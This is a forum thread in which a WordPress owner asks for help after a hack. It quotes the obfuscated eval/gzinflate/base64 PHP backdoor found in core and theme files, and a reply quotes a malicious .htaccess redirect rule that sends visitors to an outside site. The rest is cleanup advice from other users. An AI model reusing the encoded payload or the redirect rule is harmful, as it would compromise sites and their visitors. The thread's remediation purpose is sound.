iRob

Active Member
107
2012
3
0
I'm having a problem in WP. I don't know how it came about or whether someone injected the code. It looks like this:
Code:
<?php eval(gzinflate(base64_decode('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')));?>

I found this code in many files of my WP install, like index.php, wp-config.php, wp-setting.php, in my theme header, footer, functions.php and in other places.
Because of this my site is not functioning well and I can't access my WP dashboard.
Before I can use my dashboard I have to delete that code, but this code keeps reappearing again and again.

Can anyone help me what should I do?
 
25 comments
Needless to say, you got hacked.

Depending on your circumstances you may want to disable eval, base64_decode and gzinflate.

You can do this in php.ini by looking for the line

Code:
 disable_functions =

and set it to

Code:
 disable_functions = eval, base64_decode, gzinflate

You will need to restart your web server for the changes to take effect.

Don't you ever, ever, leave your website without a backup!
 
Are you on Shared Web Hosting or a VPS/Dedicated Hosting?

If on Shared Hosting, you would need to log on to your cPanel, which has been provided by your hosting provider, and search for php.ini.

If that's not the case and you are on a VPS/Dedi, you will need to log on through SSH, which has also been provided by your hosting provider, navigate to the etc folder, and you should find and edit the php.ini file according to the above suggestion.
Otherwise, it should be around /etc/php.ini
 
I was on a VPS when it happened, but after this I transferred to shared hosting as I didn't have cPanel access on the VPS.
I searched but it says no records found.
 
My bad, unless you have a dedicated or virtual server, you are not allowed to edit system-wide PHP settings.

You should perhaps contact your hosting provider and ask them to change the php.ini settings for you.
Good luck.
 
OK thanks. I contacted my host. I hope they'll help me and this problem will be solved.
BTW, if I had had a backup before, what would the process have been? I remember I had a full backup of my site, but it's a very old one.
 
In your case, I don't see a backup helping that much, as there is most likely another backdoor added to your website, which would most likely result in you getting that infection again.
Your computer has most likely been hacked; if not, your hosting provider has been hacked.

If you have access to your FTP log files, you will see some entries like this:

Code:
    Sat Jun 13 21:41:48 2013 0 XX.XX.XX.XX 2848 /home/(name of your account)/public_html/default.php b _ i r ftpaccount ftp 1 * c
The FTP account shown in the log entry will be the one that has been used by the hackers to upload the default.php files to your site. Whoever is using that account legitimately could be using a computer with a virus on it that has stolen the passwords.

The default.php files are also used to upload malicious .htaccess files. The .htaccess file can be found in your root folder.
Those files will have something like this:

Code:
RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http: //[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
    RewriteRule ^.*$ http: //le-guide-thalasso-sainte-maxime. com/wapn.html?h=1415319 [L,R]
On the last line, the format is basically the same:
Code:
URL/randomname.html?h=(some numbers)
Next, reviewing the log files will show you where on your site the files were uploaded and then you can delete those files. Check your .htaccess files for any code similar to the above. If there was already a .htaccess file in that folder, they have added their malicious redirects. The above lines can simply be removed from your file.

If there wasn’t already a .htaccess file there then the hackers have added one and it can just be deleted.

With this infection there are typically additional backdoor shell scripts added to the site as well. Those have generally been something using the base64_decode string so you can search your files for that and then further analyze the file to determine if it’s malicious or not.

First protection measures to be taken immediately:

Back up your hacked website: this way, you can investigate further how your site was attacked when you have the time.
If you don't know how, log in to your cPanel and do a Full Backup from the cPanel menu.

Proceed with changing all your passwords: hosting accounts, FTP, WordPress password. DO NOT log in to your website until you make sure you have an absolutely clean computer: get an antivirus, do a full scan, get an anti-malware program (I'd suggest MalwareBytes), do a full scan.
Proceed by deleting everything found; if there isn't anything found, then your hosting provider got hacked.


You need to make certain that your passwords are strong and follow these guidelines:

Code:
At least 9 characters
    Uses a combination of upper and lower case letters
    Includes numbers
    Has at least 3 special characters (!@#$%^&*()_+|}{“:?>< ,./';[]\=-)
    Is unique to you (don’t use the same password on multiple accounts)

If you have partner(s) - Don’t give anyone the new password until they’ve run a full virus scan on their computers too.

Then remove the default.php files and scan for any other files with base64_decode in them and review them carefully to determine if they are actually hacker backdoor shells.

Get back to us once you have fully checked your computer and contacted your hosting provider asking them whether they might have gotten hacked or if other websites they host may have reported the same issue.

As I noticed, you seem to be a novice at this, so I hope you found my instructions and explanations easy to follow.
Good luck.
 
No problem iRob. Like I mentioned above, make sure you proceed with the virus, malware and keylogger removal procedure, then get back to us with the results of the scan and whether you had an infected machine or not.
 
OK. My PC is clean, and my host has disabled the functions as you said, but now my site is showing blank. Just a white page.
 
Dear iRob.

It's safe to say you are on the safe side now. Disabling those functions seems not to have helped much, so please ask your host to enable them again and see if your website works. Once done, get back to us and I shall provide further instructions.
 
Why would the site be blank? Did you touch anything else other than those functions on the php.ini?
Do you have the backup I told you to do?
 
Yeah, I made a full backup today. I don't have access to php.ini; my host did that. Actually, I had deleted the same code starting with base64_decode at the end of public_html/wp-content/themes/bizom/functions.php.
 